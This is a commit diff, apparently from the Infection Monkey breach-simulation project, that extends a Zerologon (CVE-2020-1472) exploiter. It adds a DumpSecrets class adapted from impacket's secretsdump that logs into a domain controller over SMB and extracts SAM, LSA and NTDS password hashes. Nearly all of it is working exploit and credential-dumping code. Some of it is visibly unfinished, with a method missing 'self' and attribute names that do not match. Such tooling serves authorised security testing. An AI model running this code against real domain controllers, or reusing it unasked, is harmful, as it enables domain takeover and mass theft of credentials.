Get original passwords' hashes
This commit is contained in:
parent
a4207494ec
commit
5cd8b39f0f
|
@ -3,19 +3,28 @@ Zerologon, CVE-2020-1472
|
|||
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
|
||||
"""
|
||||
|
||||
from __future__ import division, print_function
|
||||
|
||||
import argparse
|
||||
import codecs
|
||||
import logging
|
||||
|
||||
from impacket.dcerpc.v5 import epm, nrpc, transport
|
||||
|
||||
from impacket.dcerpc.v5 import nrpc, epm
|
||||
from impacket.dcerpc.v5.dtypes import NULL
|
||||
from impacket.dcerpc.v5 import transport
|
||||
from impacket import crypto
|
||||
from impacket.dcerpc.v5.ndr import NDRCALL
|
||||
import impacket
|
||||
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
from binascii import hexlify, unhexlify
|
||||
from Cryptodome.Cipher import DES, AES, ARC4
|
||||
|
||||
import impacket
|
||||
from Cryptodome.Cipher import AES, ARC4, DES
|
||||
from impacket import crypto, version
|
||||
from impacket.dcerpc.v5 import epm, nrpc, transport
|
||||
from impacket.dcerpc.v5.dtypes import NULL
|
||||
from impacket.dcerpc.v5.ndr import NDRCALL
|
||||
from impacket.examples import logger
|
||||
from impacket.examples.secretsdump import (LocalOperations, LSASecrets,
|
||||
NTDSHashes, RemoteOperations,
|
||||
SAMHashes)
|
||||
from impacket.krb5.keytab import Keytab
|
||||
from impacket.smbconnection import SMBConnection
|
||||
|
||||
from infection_monkey.network.windowsserver_fingerprint import ZerologonFinger
|
||||
|
||||
|
@ -26,6 +35,33 @@ class ZerologonExploiter(HostExploiter):
|
|||
_TARGET_OS_TYPE = ['windows']
|
||||
_EXPLOITED_SERVICE = 'Netlogon'
|
||||
MAX_ATTEMPTS = 2000
|
||||
OPTIONS_FOR_SECRETSDUMP =\
|
||||
{
|
||||
'aes_key': None,
|
||||
'bootkey': None,
|
||||
'dc_ip': None,
|
||||
'debug': False,
|
||||
'exec_method': 'smbexec',
|
||||
'hashes': None,
|
||||
'history': False,
|
||||
'just_dc': True,
|
||||
'just_dc_ntlm': False,
|
||||
'just_dc_user': None,
|
||||
'k': False,
|
||||
'keytab': None,
|
||||
'no_pass': True,
|
||||
'ntds': None,
|
||||
'outputfile': None,
|
||||
'pwd_last_set': False,
|
||||
'resumefile': None,
|
||||
'sam': None,
|
||||
'security': None,
|
||||
'system': None,
|
||||
# target and target_ip are assigned in get_original_pwd_nthash()
|
||||
'ts': False,
|
||||
'use_vss': False,
|
||||
'user_status': False
|
||||
}
|
||||
|
||||
def __init__(self, host):
|
||||
super().__init__(host)
|
||||
|
@ -65,7 +101,6 @@ class ZerologonExploiter(HostExploiter):
|
|||
LOG.info("Non-zero return code, something went wrong.")
|
||||
|
||||
## how do i execute monkey on the exploited machine?
|
||||
## restore password
|
||||
|
||||
else:
|
||||
LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
|
||||
|
@ -101,8 +136,6 @@ class ZerologonExploiter(HostExploiter):
|
|||
return rpc_con.request(request)
|
||||
|
||||
def restore_password(self, DC_HANDLE, DC_IP, DC_NAME, original_pwd_nthash):
|
||||
## get nthash using secretsdump and then restore password
|
||||
|
||||
# Keep authenticating until successful.
|
||||
LOG.info("Restoring original password...")
|
||||
|
||||
|
@ -116,6 +149,21 @@ class ZerologonExploiter(HostExploiter):
|
|||
else:
|
||||
LOG.info("Failed to restore password.")
|
||||
|
||||
def get_original_pwd_nthash(DC_NAME, DC_IP):
|
||||
OPTIONS_FOR_SECRETSDUMP['target'] = '\\$@'.join([DC_NAME, DC_IP]) # format for DC account: NetBIOSName\$@10.2.1.1
|
||||
OPTIONS_FOR_SECRETSDUMP['target_ip'] = DC_IP
|
||||
|
||||
domain, username, password, remote_name = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
|
||||
OPTIONS_FOR_SECRETSDUMP['target']).groups('')
|
||||
|
||||
# In case the password contains '@'
|
||||
if '@' in remote_name:
|
||||
password = password + '@' + remote_name.rpartition('@')[0]
|
||||
remote_name = remote_name.rpartition('@')[2]
|
||||
|
||||
dumper = DumpSecrets(remote_name, username, password, domain, OPTIONS_FOR_SECRETSDUMP)
|
||||
dumper.dump()
|
||||
|
||||
def attempt_restoration(self, DC_HANDLE, DC_IP, DC_NAME, original_pwd_nthash):
|
||||
# Connect to the DC's Netlogon service.
|
||||
rpc_con = self.connect_to_dc(DC_IP)
|
||||
|
@ -194,3 +242,209 @@ class NetrServerPasswordSetResponse(nrpc.NDRCALL):
|
|||
('ReturnAuthenticator', nrpc.NETLOGON_AUTHENTICATOR),
|
||||
('ErrorCode', nrpc.NTSTATUS),
|
||||
)
|
||||
|
||||
|
||||
# Adapted from https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
|
||||
class DumpSecrets:
|
||||
def __init__(self, remote_name, username='', password='', domain='', options=None):
|
||||
self.__use_VSS_method = options['use_vss']
|
||||
self.__remote_name = remote_name
|
||||
self.__remote_host = options['target_ip']
|
||||
self.__username = username
|
||||
self.__password = password
|
||||
self.__domain = domain
|
||||
self.__lmhash = ''
|
||||
self.__nthash = ''
|
||||
self.__aes_key = options['aes_key']
|
||||
self.__smb_connection = None
|
||||
self.__remote_ops = None
|
||||
self.__SAM_hashes = None
|
||||
self.__NTDS_hashes = None
|
||||
self.__LSA_secrets = None
|
||||
self.__system_hive = options['system']
|
||||
self.__bootkey = options['bootkey']
|
||||
self.__security_hive = options['security']
|
||||
self.__sam_hive = options['sam']
|
||||
self.__ntds_file = options['ntds']
|
||||
self.__history = options['history']
|
||||
self.__no_lmhash = True
|
||||
self.__is_remote = True
|
||||
self.__output_file_name = options['outputfile']
|
||||
self.__do_kerberos = options['k']
|
||||
self.__just_DC = options['just_dc']
|
||||
self.__just_DC_NTLM = options['just_dc_ntlm']
|
||||
self.__just_user = options['just_dc_user']
|
||||
self.__pwd_last_set = options['pwd_last_set']
|
||||
self.__print_user_status = options['user_status']
|
||||
self.__resume_file_name = options['resumefile']
|
||||
self.__can_process_SAM_LSA = True
|
||||
self.__kdc_host = options['dc_ip']
|
||||
self.__options = options
|
||||
|
||||
if options['hashes'] is not None:
|
||||
self.__lmhash, self.__nthash = options['hashes'].split(':')
|
||||
|
||||
def connect(self):
|
||||
self.__smb_connection = SMBConnection(self.__remote_name, self.__remote_host)
|
||||
if self.__do_kerberos:
|
||||
self.__smb_connection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,
|
||||
self.__nthash, self.__aes_key, self.__kdc_host)
|
||||
else:
|
||||
self.__smb_connection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
|
||||
|
||||
def dump(self):
|
||||
try:
|
||||
if self.__remote_name.upper() == 'LOCAL' and self.__username == '':
|
||||
self.__is_remote = False
|
||||
self.__use_VSS_method = True
|
||||
if self.__system_hive:
|
||||
local_operations = LocalOperations(self.__system_hive)
|
||||
bootkey = local_operations.getBootKey()
|
||||
if self.__ntds_file is not None:
|
||||
# Let's grab target's configuration about LM Hashes storage
|
||||
self.__no_lmhash = local_operations.checkNoLMHashPolicy()
|
||||
else:
|
||||
import binascii
|
||||
bootkey = binascii.unhexlify(self.__bootkey)
|
||||
|
||||
else:
|
||||
self.__is_remote = True
|
||||
bootkey = None
|
||||
try:
|
||||
try:
|
||||
self.connect()
|
||||
except Exception as e:
|
||||
if os.getenv('KRB5CCNAME') is not None and self.__do_kerberos is True:
|
||||
# SMBConnection failed. That might be because there was no way to log into the
|
||||
# target system. We just have a last resort. Hope we have tickets cached and that they
|
||||
# will work
|
||||
logging.debug('SMBConnection didn\'t work, hoping Kerberos will help (%s)' % str(e))
|
||||
pass
|
||||
else:
|
||||
raise
|
||||
|
||||
self.__remote_ops = RemoteOperations(self.__smb_connection, self.__do_kerberos, self.__kdc_host)
|
||||
self.__remote_ops.setExecMethod(self.__options['exec_method'])
|
||||
if self.__just_dc is False and self.__just_DC_NTLM is False or self.__use_VSS_method is True:
|
||||
self.__remote_ops.enableRegistry()
|
||||
bootkey = self.__remote_ops.getBootKey()
|
||||
# Let's check whether target system stores LM Hashes
|
||||
self.__no_lmhash = self.__remote_ops.checkNoLMHashPolicy()
|
||||
except Exception as e:
|
||||
self.__can_process_SAM_LSA = False
|
||||
if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \
|
||||
and self.__do_kerberos is True:
|
||||
# Giving some hints here when SPN target name validation is set to something different to Off
|
||||
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/
|
||||
logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump.' +
|
||||
'Try -just-dc-user')
|
||||
else:
|
||||
logging.error('RemoteOperations failed: %s' % str(e))
|
||||
|
||||
# If RemoteOperations succeeded, then we can extract SAM and LSA
|
||||
if self.__just_dc is False and self.__just_dc_ntlm is False and self.__can_process_SAM_LSA:
|
||||
try:
|
||||
if self.__is_remote is True:
|
||||
SAM_file_name = self.__remote_ops.saveSAM()
|
||||
else:
|
||||
SAM_file_name = self.__sam_hive
|
||||
|
||||
self.__SAM_hashes = SAMHashes(SAM_file_name, bootkey, isRemote=self.__is_remote)
|
||||
self.__SAM_hashes.dump()
|
||||
if self.__output_file_name is not None:
|
||||
self.__SAM_hashes.export(self.__output_file_name)
|
||||
except Exception as e:
|
||||
logging.error('SAM hashes extraction failed: %s' % str(e))
|
||||
|
||||
try:
|
||||
if self.__is_remote is True:
|
||||
SECURITY_file_name = self.__remote_ops.saveSECURITY()
|
||||
else:
|
||||
SECURITY_file_name = self.__security_hive
|
||||
|
||||
self.__LSA_secrets = LSASecrets(SECURITY_file_name, bootkey, self.__remote_ops,
|
||||
isRemote=self.__is_remote, history=self.__history)
|
||||
self.__LSA_secrets.dumpCachedHashes()
|
||||
if self.__output_file_name is not None:
|
||||
self.__LSA_secrets.exportCached(self.__output_file_name)
|
||||
self.__LSA_secrets.dumpSecrets()
|
||||
if self.__output_file_name is not None:
|
||||
self.__LSA_secrets.exportSecrets(self.__output_file_name)
|
||||
except Exception as e:
|
||||
if logging.getLogger().level == logging.DEBUG:
|
||||
import traceback
|
||||
traceback.print_exc()
|
||||
logging.error('LSA hashes extraction failed: %s' % str(e))
|
||||
|
||||
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
|
||||
if self.__is_remote is True:
|
||||
if self.__use_VSS_method and self.__remote_ops is not None:
|
||||
NTDS_file_name = self.__remote_ops.saveNTDS()
|
||||
else:
|
||||
NTDS_file_name = None
|
||||
else:
|
||||
NTDS_file_name = self.__ntds_file
|
||||
|
||||
self.__NTDS_hashes = NTDSHashes(NTDS_file_name, bootkey, isRemote=self.__is_remote, history=self.__history,
|
||||
noLMHash=self.__no_lmhash, remoteOps=self.__remote_ops,
|
||||
useVSSmethod=self.__use_VSS_method, justNTLM=self.__just_DC_NTLM,
|
||||
pwdLastSet=self.__pwd_last_set, resumeSession=self.__resume_file_name,
|
||||
outputFileName=self.__output_file_name, justUser=self.__just_user,
|
||||
printUserStatus=self.__print_user_status)
|
||||
try:
|
||||
self.__NTDS_hashes.dump()
|
||||
except Exception as e:
|
||||
if logging.getLogger().level == logging.DEBUG:
|
||||
import traceback
|
||||
traceback.print_exc()
|
||||
if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
|
||||
# We don't store the resume file if this error happened, since this error is related to lack
|
||||
# of enough privileges to access DRSUAPI.
|
||||
resume_file = self.__NTDS_hashes.getResumeSessionFile()
|
||||
if resume_file is not None:
|
||||
os.unlink(resume_file)
|
||||
logging.error(e)
|
||||
if self.__just_user and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >= 0:
|
||||
logging.info("You just got that error because there might be some duplicates of the same name. "
|
||||
"Try specifying the domain name for the user as well. It is important to specify it "
|
||||
"in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
|
||||
elif self.__use_VSS_method is False:
|
||||
logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
|
||||
self.cleanup()
|
||||
except (Exception, KeyboardInterrupt) as e:
|
||||
if logging.getLogger().level == logging.DEBUG:
|
||||
import traceback
|
||||
traceback.print_exc()
|
||||
logging.error(e)
|
||||
if self.__NTDS_hashes is not None:
|
||||
if isinstance(e, KeyboardInterrupt):
|
||||
while True:
|
||||
answer = input("Delete resume session file? [y/N] ")
|
||||
if answer.upper() == '':
|
||||
answer = 'N'
|
||||
break
|
||||
elif answer.upper() == 'Y':
|
||||
answer = 'Y'
|
||||
break
|
||||
elif answer.upper() == 'N':
|
||||
answer = 'N'
|
||||
break
|
||||
if answer == 'Y':
|
||||
resume_file = self.__NTDS_hashes.getResumeSessionFile()
|
||||
if resume_file is not None:
|
||||
os.unlink(resume_file)
|
||||
try:
|
||||
self.cleanup()
|
||||
except:
|
||||
pass
|
||||
|
||||
def cleanup(self):
|
||||
logging.info('Cleaning up... ')
|
||||
if self.__remote_ops:
|
||||
self.__remote_ops.finish()
|
||||
if self.__SAM_hashes:
|
||||
self.__SAM_hashes.finish()
|
||||
if self.__LSA_secrets:
|
||||
self.__LSA_secrets.finish()
|
||||
if self.__NTDS_hashes:
|
||||
self.__NTDS_hashes.finish()
|
||||
|
|
Loading…
Reference in New Issue